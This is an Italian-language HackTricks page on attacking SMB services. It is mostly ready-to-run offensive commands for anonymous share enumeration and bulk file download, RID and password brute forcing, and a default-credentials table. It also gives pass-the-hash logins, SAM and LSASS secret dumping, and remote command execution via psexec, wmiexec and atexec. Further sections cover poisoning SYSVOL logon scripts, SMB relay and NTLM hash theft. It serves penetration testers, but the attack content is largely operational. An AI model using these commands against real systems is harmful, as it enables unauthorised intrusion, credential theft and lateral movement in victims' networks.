139,445 - Pentesting SMB
Tip
Impara e pratica il hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP:HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al đŹ gruppo Discord o al gruppo telegram o seguici su Twitter đŚ @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.
Port 139
Il Network Basic Input Output System** (NetBIOS)** è un protocollo software progettato per permettere ad applicazioni, PC e desktop allâinterno di una rete locale (LAN) di interagire con lâhardware di rete e facilitare la trasmissione dei dati attraverso la rete. Lâidentificazione e la localizzazione delle applicazioni software che operano su una rete NetBIOS vengono effettuate tramite i loro nomi NetBIOS, che possono arrivare fino a 16 caratteri e spesso sono distinti dal nome del computer. Una sessione NetBIOS tra due applicazioni viene avviata quando unâapplicazione (che funge da client) invia un comando per âcallâ a unâaltra applicazione (che funge da server) utilizzando TCP Port 139.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
Porta 445
Tecnicamente, la porta 139 è indicata come âNBT over IPâ, mentre la porta 445 è identificata come âSMB over IPâ. Lâacronimo SMB sta per âServer Message Blocksâ, noto anche piĂš modernamente come Common Internet File System (CIFS). Come protocollo di rete a livello applicazione, SMB/CIFS è impiegato principalmente per permettere lâaccesso condiviso a file, stampanti, porte seriali e per agevolare varie forme di comunicazione tra i nodi di una rete.
Ad esempio, nel contesto di Windows, si sottolinea che SMB può funzionare direttamente su TCP/IP, eliminando la necessitĂ di NetBIOS over TCP/IP, mediante lâutilizzo della porta 445. Al contrario, su altri sistemi si osserva lâuso della porta 139, il che indica che SMB viene eseguito in combinazione con NetBIOS over TCP/IP.
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
SMB
Il Server Message Block (SMB) protocollo, che opera con un modello client-server, è progettato per regolare lâaccesso a file, directory e altre risorse di rete come stampanti e router. Utilizzato principalmente nella serie di sistemi operativi Windows, SMB garantisce compatibilitĂ retroattiva, permettendo a dispositivi con versioni piĂš recenti del sistema operativo Microsoft di interagire senza problemi con quelli che eseguono versioni piĂš vecchie. Inoltre, il progetto Samba offre una soluzione software libera che consente lâimplementazione di SMB su sistemi Linux e Unix, facilitando cosĂŹ la comunicazione cross-platform tramite SMB.
Le condivisioni (Shares), che rappresentano parti arbitrarie del file system locale, possono essere fornite da un server SMB, rendendo la gerarchia visibile a un client in parte indipendente dalla struttura effettiva del server. Le Access Control Lists (ACLs), che definiscono i diritti di accesso, permettono un controllo granulare sui permessi degli utenti, inclusi attributi come execute, read e full access. Questi permessi possono essere assegnati a singoli utenti o gruppi, in base alle condivisioni, e sono distinti dai permessi locali impostati sul server.
IPC$ Share
Lâaccesso alla IPC$ share può essere ottenuto tramite una null session anonima, permettendo lâinterazione con i servizi esposti tramite named pipes. LâutilitĂ enum4linux è utile a questo scopo. Usata correttamente, permette di acquisire:
- Informazioni sul sistema operativo
- Dettagli sul dominio principale
- Un elenco di utenti e gruppi locali
- Informazioni sulle SMB shares disponibili
- La policy di sicurezza di sistema effettiva
Questa funzionalità è critica per amministratori di rete e professionisti della sicurezza per valutare la postura di sicurezza dei servizi SMB su una rete. enum4linux fornisce una visione completa dellâambiente SMB del sistema target, essenziale per identificare potenziali vulnerabilitĂ e garantire che i servizi SMB siano adeguatamente protetti.
enum4linux -a target_ip
Il comando precedente è un esempio di come enum4linux possa essere utilizzato per eseguire unâenumerazione completa contro un target specificato da target_ip.
Che cosâè NTLM
Se non sai cosâè NTLM o vuoi capire come funziona e come abusarne, troverai molto interessante questa pagina su NTLM dove viene spiegato come funziona questo protocollo e come puoi sfruttarlo:
Enumerazione dei server
Scan di una rete alla ricerca di host:
nbtscan -r 192.168.0.1/24
Versione del server SMB
Per cercare possibili exploit relativi alla versione SMB, è importante sapere quale versione è in uso. Se queste informazioni non compaiono negli altri strumenti utilizzati, puoi:
- Usa il modulo ausiliario MSF
**auxiliary/scanner/smb/smb_version** - Oppure questo script:
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
Cerca exploit
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
Possibili Credentials
| Username(s) | Common passwords |
|---|---|
| (blank) | (blank) |
| guest | (blank) |
| Administrator, admin | (blank), password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
Brute Force
Informazioni sullâambiente SMB
Ottenere informazioni
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>
#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
Enumerare utenti, gruppi & utenti connessi
Queste informazioni dovrebbero essere giĂ state raccolte da enum4linux e enum4linux-ng
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
Elencare gli utenti locali
lookupsid.py -no-pass hostname.local
Comando monoriga
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Metasploit - Enumerare gli utenti locali
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
Enumerazione di LSARPC e SAMR con rpcclient
Connessione GUI da Linux
Nel terminale:
xdg-open smb://cascade.htb/
Nella finestra del file browser (nautilus, thunar, etc)
smb://friendzone.htb/general/
Enumerazione delle cartelle condivise
Elencare le cartelle condivise
Ă sempre consigliato verificare se puoi accedere a qualcosa; se non hai credenziali prova a usare null credentials/guest user.
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
Connetti/Elenca una cartella condivisa
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
Enumerare manualmente gli share di Windows e connettersi a essi
Potrebbe accadere che tu non possa visualizzare gli share della macchina host e che, provando a elencarli, sembri che non esistano share a cui connettersi. Perciò vale la pena tentare brevemente di connettersi manualmente a uno share. Per enumerare manualmente gli share potresti cercare risposte come NT_STATUS_ACCESS_DENIED e NT_STATUS_BAD_NETWORK_NAME quando usi una sessione valida (es. null session o credenziali valide). Queste possono indicare se lo share esiste e non hai accesso, oppure che lo share non esiste affatto.
Common share names for windows targets are
- C$
- D$
- ADMIN$
- IPC$
- PRINT$
- FAX$
- SYSVOL
- NETLOGON
(Nomi comuni degli share tratti da Network Security Assessment 3rd edition)
You can try to connect to them by using the following command
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
o questo script (usando una null session)
#/bin/bash
ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
for share in ${shares[*]}; do
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
if [[ -z $output ]]; then
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
else
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
fi
done
esempi
smbclient -U '%' -N \\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
Enumerare le condivisioni da Windows / senza strumenti di terze parti
PowerShell
# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
Console CMD
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
MMC Snap-in (grafico)
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
explorer.exe (grafico), inserire \\<ip>\ per vedere le shares non-nascoste disponibili.
Mount a shared folder
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
Scarica file
Leggi le sezioni precedenti per imparare come connettersi con credentials/Pass-the-Hash.
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
Comandi:
- mask: specifica la mask usata per filtrare i file nella directory (es. ââ per tutti i file)
- recurse: abilita la ricorsione (predefinito: disattivato)
- prompt: disattiva la richiesta dei nomi file (predefinito: attivo)
- mget: copia tutti i file che corrispondono alla mask dallâhost alla macchina client
(Informazioni dalla manpage di smbclient)
Ricerca cartelle condivise del dominio
Snaffler.exe -s -d domain.local -o snaffler.log -v data
- CrackMapExec spider.
-M spider_plus [--share <share_name>]--pattern txt
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
Specially interesting from shares are the files called Registry.xml as they may contain passwords for users configured with autologon via Group Policy. Or web.config files as they contains credentials.
Tip
La SYSVOL share è leggibile da tutti gli utenti autenticati nel dominio. Al suo interno potresti trovare molti diversi script batch, VBScript e PowerShell scripts. Dovresti controllare gli scripts al suo interno poichÊ potresti trovare informazioni sensibili come passwords. Inoltre, non fidarti degli elenchi di condivisione automatici: anche se una share sembra di sola lettura, gli NTFS ACLs sottostanti possono permettere scritture. Testalo sempre con smbclient caricando un piccolo file in
\\<dc>\\SYSVOL\\<domain>\\scripts\\. Se scrivibile, puoi poison logon scripts for RCE at user logon.
ShareHound â OpenGraph collector for SMB shares (BloodHound)
ShareHound scopre le SMB shares del dominio, le percorre, estrae gli ACLs e genera un file OpenGraph JSON per BloodHound CE/Enterprise.
- Raccolta di base:
- LDAP: enumerare gli oggetti computer, leggere
dNSHostName - DNS: risolvere ogni host
- SMB: elencare le shares sugli host raggiungibili
- Crawl shares (BFS/DFS), enumerare file/cartelle, acquisire permessi
ShareQL-driven traversal
- ShareQL è un DSL first-match-wins per consentire/negare la traversal per host/share/path e impostare la max depth per regola. Concentrati sulle shares interessanti e limita la ricorsione.
Example ShareQL rules
# Only crawl shares with name containing "backup", up to depth 2
allow host * share * path * depth 0
allow host * share *backup* path * depth 2
deny host * share * path *
Uso
sharehound -ai "10.0.100.201" -au "user" -ap "Test123!" -ns "10.0.100.201" \
-rf "rules/skip_common_shares.shareql" -rf "rules/max_depth_2.shareql"
- Fornire credenziali AD tramite
-ad/-au/-ap(o usare-adcon-au/-ap). Usare-r/-rfper regole inline o file. - Output: JSON OpenGraph; importalo in BloodHound per interrogare host/condivisioni/file e i diritti effettivi.
- Suggerimento: limita la profonditĂ massima a 1â2 a meno che i tuoi filtri non siano molto restrittivi.
BloodHound attack-surface queries
- Principals con accesso di tipo scrittura sulle condivisioni
MATCH x=(p)-[r:CanWriteDacl|CanWriteOwner|CanDsWriteProperty|CanDsWriteExtendedProperties]->(s:NetworkShareSMB)
RETURN x
- Principals con FULL_CONTROL sulle condivisioni
Cypher: principals con FULL_CONTROL sulle condivisioni
```cypher MATCH (p:Principal)-[r]->(s:NetworkShareSMB) WHERE (p)-[:CanDelete]->(s) AND (p)-[:CanDsControlAccess]->(s) AND (p)-[:CanDsCreateChild]->(s) AND (p)-[:CanDsDeleteChild]->(s) AND (p)-[:CanDsDeleteTree]->(s) AND (p)-[:CanDsListContents]->(s) AND (p)-[:CanDsListObject]->(s) AND (p)-[:CanDsReadProperty]->(s) AND (p)-[:CanDsWriteExtendedProperties]->(s) AND (p)-[:CanDsWriteProperty]->(s) AND (p)-[:CanReadControl]->(s) AND (p)-[:CanWriteDacl]->(s) AND (p)-[:CanWriteOwner]->(s) RETURN p,r,s ```- Cerca file sensibili per estensione (es. VMDKs)
MATCH p=(h:NetworkShareHost)-[:HasNetworkShare]->(s:NetworkShareSMB)-[:Contains*0..]->(f:File)
WHERE toLower(f.extension) = toLower(".vmdk")
RETURN p
Leggere il registro
Potresti essere in grado di leggere il registro usando alcune credenziali scoperte. Impacket reg.py ti permette di provare:
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
Post Exploitation
La config predefinita di un server Samba si trova di solito in /etc/samba/smb.conf e potrebbe contenere alcune config pericolose:
| Impostazione | Descrizione |
|---|---|
browseable = yes | Consente di elencare le condivisioni disponibili nella condivisione corrente? |
read only = no | Impedisce la creazione e la modifica dei file? |
writable = yes | Consente agli utenti di creare e modificare file? |
guest ok = yes | Consente di connettersi al servizio senza usare una password? |
enable privileges = yes | Onora i privilegi assegnati a SID specifici? |
create mask = 0777 | Quali permessi devono essere assegnati ai file appena creati? |
directory mask = 0777 | Quali permessi devono essere assegnati alle directory appena create? |
logon script = script.sh | Quale script deve essere eseguito al login dellâutente? |
magic script = script.sh | Quale script dovrebbe essere eseguito quando lo script viene chiuso? |
magic output = script.out | Dove deve essere salvato lâoutput del magic script? |
Il comando smbstatus fornisce informazioni sul server e su chi è connesso.
Autenticazione con Kerberos
Puoi autenticarti a Kerberos usando gli strumenti smbclient e rpcclient:
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
Negli ambienti Kerberos-only (NTLM disabled), i tentativi NTLM contro SMB possono restituire STATUS_NOT_SUPPORTED. Risolvi i problemi comuni di Kerberos e forza Kerberos auth:
# sync clock to avoid KRB_AP_ERR_SKEW
sudo ntpdate <dc.fqdn>
# use Kerberos with tooling (reads your TGT from ccache)
netexec smb <dc.fqdn> -k
Per una configurazione completa del client (generazione di krb5.conf, kinit, avvertenze su SSH GSSAPI/SPN) vedi:
88tcp/udp - Pentesting Kerberos
Eseguire comandi
crackmapexec
crackmapexec può eseguire comandi sfruttando uno qualsiasi di mmcexec, smbexec, atexec, wmiexec essendo wmiexec il metodo predefinito. Puoi indicare quale opzione preferisci usare con il parametro --exec-method:
apt-get install crackmapexec
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
psexec/smbexec
Entrambe le opzioni creeranno un nuovo servizio (usando \pipe\svcctl via SMB) sulla macchina vittima e lo useranno per eseguire qualcosa (psexec caricherĂ un file eseguibile nella condivisione ADMIN$ e smbexec punterĂ a cmd.exe/powershell.exe inserendo negli argomenti il payload âfile-less technique--).
Maggiori info su psexec e smbexec.
In kali si trova in /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
Usando il parametro -k puoi autenticarti con kerberos anzichĂŠ con NTLM
wmiexec/dcomexec
Esegui stealth una shell di comandi senza toccare il disco o avviare un nuovo servizio utilizzando DCOM tramite port 135.
Su kali si trova in /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
Usando il parametro-k puoi autenticarti tramite kerberos invece di NTLM
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
AtExec
Eseguire comandi tramite il Task Scheduler (usando \pipe\atsvc via SMB).
In kali si trova in /usr/share/doc/python3-impacket/examples/
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
Riferimento Impacket
https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/
ksmbd attack surface and SMB2/SMB3 protocol fuzzing (syzkaller)
Ksmbd Attack Surface And Fuzzing Syzkaller
Bruteforce credenziali degli utenti
Non è raccomandato, potresti bloccare un account se superi il numero massimo di tentativi consentiti
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
SMB relay attack
Questo attacco utilizza il Responder toolkit per capture SMB authentication sessions su una rete interna e relays queste sessioni a una target machine. Se la autenticazione session is successful, ti porterĂ automaticamente in una system shell.
Maggiori informazioni su questo attacco qui.
SMB-Trap
La libreria di Windows URLMon.dll tenta automaticamente di autenticarsi allâhost quando una pagina cerca di accedere a del contenuto tramite SMB, per esempio: img src="\\10.10.10.10\path\image.jpg"
Questo accade con le funzioni:
- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream
Che sono usate da alcuni browser e strumenti (come Skype)
.png)
SMBTrap using MitMf
.png)
NTLM Theft
Simile a SMB Trapping, piantare file maligni su un target system (via SMB, per esempio) può indurre un tentativo di autenticazione SMB, permettendo lâintercettazione dellâhash NetNTLMv2 con uno strumento come Responder. Lâhash può poi essere crackato offline o usato in un SMB relay attack.
HackTricks Automatic Commands
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as âNBT over IPâ, Port 445 is âSMB over IPâ. SMB stands for âServer Message Blocksâ. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
Riferimenti
- NetExec (CME) wiki â uso di Kerberos
- Pentesting Kerberos (88) â configurazione client e risoluzione dei problemi
- ShareHound (collector)
- ShareQL (DSL)
Tip
Impara e pratica il hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP:HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al đŹ gruppo Discord o al gruppo telegram o seguici su Twitter đŚ @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.
HackTricks

